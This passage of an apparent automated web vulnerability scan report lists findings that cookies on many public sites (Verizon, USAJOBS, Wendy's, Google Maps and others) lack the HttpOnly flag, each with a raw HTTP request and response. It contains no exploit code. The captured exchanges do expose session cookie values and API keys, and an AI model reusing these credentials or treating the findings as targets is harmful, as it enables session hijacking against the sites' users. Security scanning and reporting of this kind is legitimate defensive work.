Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...

14.25. http://www.prioritymail.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prioritymail.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prioritymail.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Date: Sat, 02 Apr 2011 13:39:12 GMT
X-Powered-By: ASP.NET
X-Node: 1
Location: https://www.prioritymail.com/favicon.ico
Content-Length: 161
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQCACQDA=GFBLJJGCABNDGCLDNCJLJFPE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.prioritymail.com/favicon.ico">here</a>.</body>

14.26. http://www.pronto.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:43 GMT
Server: Apache/2.2.4 (Fedora)
Set-Cookie: JSESSIONID=612608DD194E2650C96F7544861E8212; Path=/
Set-Cookie: SESSIONID=1390698434; Domain=.pronto.com; Path=/
Set-Cookie: abt=ProntoV3_5_7-1.185-cellNum_2; Domain=.pronto.com; Expires=Mon, 02-May-2011 13:23:43 GMT; Path=/
Set-Cookie: M_ID=-4f77939a-12f1647631d-28ef; Domain=.pronto.com; Expires=Mon, 01-Apr-2013 13:23:43 GMT; Path=/
Set-Cookie: V_ID=-4f77939a-12f1647631d-28f0; Domain=.pronto.com; Path=/
ETag: W/"1150-1273607942000"
Last-Modified: Tue, 11 May 2010 19:59:02 GMT
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Via: CN-5000
Proxy-Connection: Keep-Alive

............ .h.......(....... ..... .....@.............................................`3..........................................................b...[...[6..........................................
...[SNIP]...

14.27. http://www.questia.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.questia.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.questia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:36 GMT
Set-Cookie: JSESSIONID=7CE247DEB992324E4E0F4C6DBC0D4DDC.inst3_1b; Path=/
Set-Cookie: QVID=684848763; Expires=Thu, 20-Apr-2079 17:29:43 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1406-1300281637000"
Last-Modified: Wed, 16 Mar 2011 13:20:37 GMT
Content-Length: 1406
Content-Type: image/x-icon

..............h.......(....... ...........@................................................}..ca..JM..J<..10..!.........................................................................................
...[SNIP]...

14.28. http://www.rxlist.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.rxlist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rxlist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: /images/fav/rx.ico
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAASRTCCD=JHIMJMPCINKGIBOENJHHMCBE; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:18 GMT


14.29. http://www.softonic.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.softonic.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.softonic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache
Expires: Thu, 07 Apr 2011 19:10:17 GMT
Cache-Control: max-age=451872, public
Last-Modified: Thu, 31 Mar 2011 19:10:17 GMT
ETag: "7cb651b31ce3c119df9a7081244f7ee6"
Set-Cookie: softonic_es-admin=deleted; expires=Fri, 02-Apr-2010 13:39:04 GMT; path=/; domain=softonic.com
Set-Cookie: PHPSESSID=2e29be89a8385992f825d6f55520437d; path=/; domain=softonic.com
Content-Length: 1150
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon

............ .h.......(....... ..... ...................................9c..........................................,u.o............LT.v...t....M...........................C..q...r....5i.....o....%..o
...[SNIP]...

14.30. http://www.suntimes.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.suntimes.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.suntimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:37:44 GMT
Server: Apache/2.2.3 (Red Hat)
set-cookie: CSPSESSIONID-SP-80-UP-=000000010000487voeTq000000unSIZmK6gJ43n8m0PT_7Iw--; path=/;
cache-control: no-cache
expires: Thu, 29 Oct 1998 17:04:19 GMT
pragma: no-cache
csp-transfer-encoding: chunked
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: SUNT=SUNT_ECP9; path=/
Content-Length: 127640


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" x
...[SNIP]...

14.31. http://www.thegrids.info/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thegrids.info
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thegrids.info
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:05:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=ckguqfdilu9pmnj7sfqargiqc0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 372
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
</head>
<body>

<div id="header-error">Error</div>

<div class="login-e
...[SNIP]...

14.32. http://www.thisis50.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thisis50.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thisis50.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:19 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=72496530-32a2-4001-aeeb-9a7e9872eab2;Path=/;Domain=.thisis50.com;Expires=Tue, 30-Mar-21 14:10:19 GMT
Set-Cookie: ning_session=hYUinaZPS4PpTu5L6SBL+6WnXz1ReXkZONMjZKkPvji77oXBafO3wf3mrh+eSamL2/SqG6uHda4=;Path=/;Domain=.thisis50.com;Expires=Sat, 02-Apr-11 15:10:19 GMT
X-XN-Trace-Token: a9fbec7b-7dd0-41ce-b9e7-d77a0f275cdc
ETag: "84997-483-45a8520a9ed00"
Date: Sat, 02 Apr 2011 14:09:47 GMT
Date: Sat, 02 Apr 2011 14:09:47 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Fri, 31 Oct 2008 04:35:32 GMT
CACHE-CONTROL: max-age=0
CACHE-CONTROL: no-cache="Set-Cookie"
Content-Type: image/x-icon
Accept-Ranges: bytes
Server: Ning HTTP Server 2.0
Content-Length: 1155

...[SNIP]...

14.33. http://www.travel-ticker.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.travel-ticker.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travel-ticker.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2FB9835EB71FFEAA1AA9FFE640CE8E63; Path=/
Set-Cookie: SaneID=2FB9835EB71FFEAA1AA9FFE640CE8E6; Expires=Sun, 06-Mar-2016 14:16:40 GMT; Path=/
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 14:16:40 GMT
Set-Cookie: NSC_xxx.usbwfm-ujdlfs-iuuq=ffffffffaf131c3045525d5f4f58455e445a4a422d69;path=/;httponly
Content-Length: 102294


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta name="robots" content="noindex, nofollow">

<link rel="stylesheet" href="
...[SNIP]...

14.34. http://www.usajobs.gov/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usajobs.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usajobs.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10861
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSCBQRCBB=MGJGMMNCLOGHNJBKECBCECPF; path=/
Date: Sat, 02 Apr 2011 13:35:33 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-US" dir="ltr">
<head>
<title>USAJOBS - Page Not Found</title>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...

14.35. http://www.verizon.net/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.verizon.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verizon.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12346
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 13:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:47 GMT
Connection: close
Set-Cookie: ASPSESSIONIDACTBSRTC=NNIKMLGDFJLLCPKHOIDHPHBF; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>
   <title>Verizon Online - Page Not Found</title>
   <meta http-equi
...[SNIP]...

14.36. http://www.websitealive.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.websitealive.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.websitealive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9592
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDCSBSCDBC=MAKNBCJDCBAEBCFJJAGGECIK; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:23 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/
...[SNIP]...

14.37. http://www.wellness.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wellness.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wellness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:33:48 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
Content-Length: 50558
Content-Type: text/html
Cache-Control: private
Set-Cookie: WWFLV=LV=2011%2D4%2D2+6%3A33%3A48; expires=Mon, 02-Apr-2012 13:33:48 GMT; path=/
Set-Cookie: ASPSESSIONIDACQCTCRD=BJAKHBHDIHGAFFDGECCKGLMB; path=/
X-Cache: MISS from squid1.earnware.corp
X-Cache-Lookup: MISS from squid1.earnware.corp:80
Via: 1.0 wellness.com, 1.0 squid1.earnware.corp (squid)
Connection: close

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>The pursuit of health and happiness - 404 Not Foun
...[SNIP]...

14.38. http://www.wendys.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wendys.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wendys.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:21:04 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301754064.692481; expires=Tue, 30-Mar-2021 14:21:04 GMT; path=/
Cache-Control: no-cache="Set-Cookie"
Content-Length: 17168
Set-Cookie: JSESSIONID=LcGjNXwbjjyX5TMBb6LvJJ2GQryf2GG2hgTwfwlShqp5tyGp3qkq!2031274302!-998707752; path=/
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpool-x-www.wendys.com=784924426.4391.0000; path=/
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7
...[SNIP]...

14.39. http://www.windows.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.windows.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.windows.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 23
Content-Type: text/html
Location: http://www.microsoft.com/windows/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAARACQBT=HHGJNAECBBBHPMMEAGHKBEJM; path=/
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 02 Apr 2011 12:37:54 GMT
Connection: close

<!--TOOLBAR_EXEMPT-->

14.40. http://www.worthpoint.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.worthpoint.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worthpoint.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:54 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: wp_session=173.193.214.243.1301751474503452; path=/; domain=.worthpoint.com
Last-Modified: Mon, 13 Apr 2009 18:38:55 GMT
ETag: "17b85c4-13e-4677406cfedc0"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8

...[SNIP]...

14.41. http://maps.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=2&sensor=false&key=ABQIAAAAVJ-8d4AfG2CkFxRLVwO_ehTi6M0C0dLhwsIDdnxX2F6jwPoofxQBhmKRHrEcPVj3dDDnmUmbR72EXg&sfgdata=+sfgRmluamFuX1R5cGU9amF2YV9zY3JpcHQmRmluamFuX0xhbmc9dGV4dC9qYXZhc2NyaXB0+a HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/brighton
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752060:GM=1:IG=3:SG=1:S=pQ1PkWLa_0C6rZC1

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752649:GM=1:IG=3:SG=1:S=d5391Or4mtSSJS9x; expires=Mon, 01-Apr-2013 13:57:29 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:57:29 GMT
Server: mfe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Sat, 02 Apr 2011 13:57:29 GMT
Content-Length: 11871

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...

14.42. http://maps.google.com/maps/gen_204

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/gen_204

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/gen_204?imp=maps_api_set_default_ui HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/brighton
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752649:GM=1:IG=3:SG=1:S=d5391Or4mtSSJS9x

Response

HTTP/1.1 204 No Content
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752651:GM=1:IG=3:SG=1:S=mnR2BkyBhZFvD7WE; expires=Mon, 01-Apr-2013 13:57:31 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:57:31 GMT
Server: mfe
Content-Length: 0
X-XSS-Protection: 1; mode=block


14.43. http://maps.google.com/maps/vp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/vp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/vp?spn=0.048799,0.102997&z=13&key=ABQIAAAAVJ-8d4AfG2CkFxRLVwO_ehTi6M0C0dLhwsIDdnxX2F6jwPoofxQBhmKRHrEcPVj3dDDnmUmbR72EXg&sensor=false&mapclient=jsapi&vp=50.82267,-0.14441 HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/brighton
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752649:GM=1:IG=3:SG=1:S=d5391Or4mtSSJS9x

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:31 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752651:GM=1:IG=3:SG=1:S=mnR2BkyBhZFvD7WE; expires=Mon, 01-Apr-2013 13:57:31 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 1332

GAddCopyright("m","11605834097857221387",50.7983,-0.1959,50.8471,-0.0929,13,"Tele Atlas",19,false);
window.GAppFeatures && window.GAppFeatures({cb:{bounds:[{s:50889174,w:-285645,n:50903033,e:-153809,i
...[SNIP]...

14.44. http://safebrowsing.clients.google.com/safebrowsing/downloads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=10.0.648.204&pver=2.2&wrkey=AKEgNiu2mFE63FMw496NljDbfuqWVUHfR5aspR9G78SPoDGBnjDblFO5_v3By_lHgdefi2qYWL0qQkqRPEgqQcEZbPgzqr3RaA== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301746656:GM=1:IG=3:SG=1:S=-7aZMRhsTdHlesaT
Content-Length: 104

goog-malware-shavar;a:28068-35165:s:40805-47673:mac
goog-phish-shavar;a:130630-134965:s:67129-68856:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301748493:GM=1:IG=3:SG=1:S=dU5RHSbYxFO9H3Ys; expires=Mon, 01-Apr-2013 12:48:13 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:48:13 GMT
Server: Chunked Update Server
Content-Length: 369
X-XSS-Protection: 1; mode=block
Expires: Sat, 02 Apr 2011 12:48:13 GMT
Cache-Control: private

m:sDWcvq3SwCNj5QAXb_7v9pezsYg=
n:1772
i:goog-malware-shavar
i:goog-phish-shavar
ad:130630-130632
u:safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchABGPiZBCD8mQQqBfoMAQAHMgX4DAE
...[SNIP]...

14.45. http://smp.adviva.net/track/v=4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smp.adviva.net
Path:   /track/v=4

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /track/v=4;m=1;t=7841;ts=%3Ctimestamp_here%3E HTTP/1.1
Host: smp.adviva.net
Proxy-Connection: keep-alive
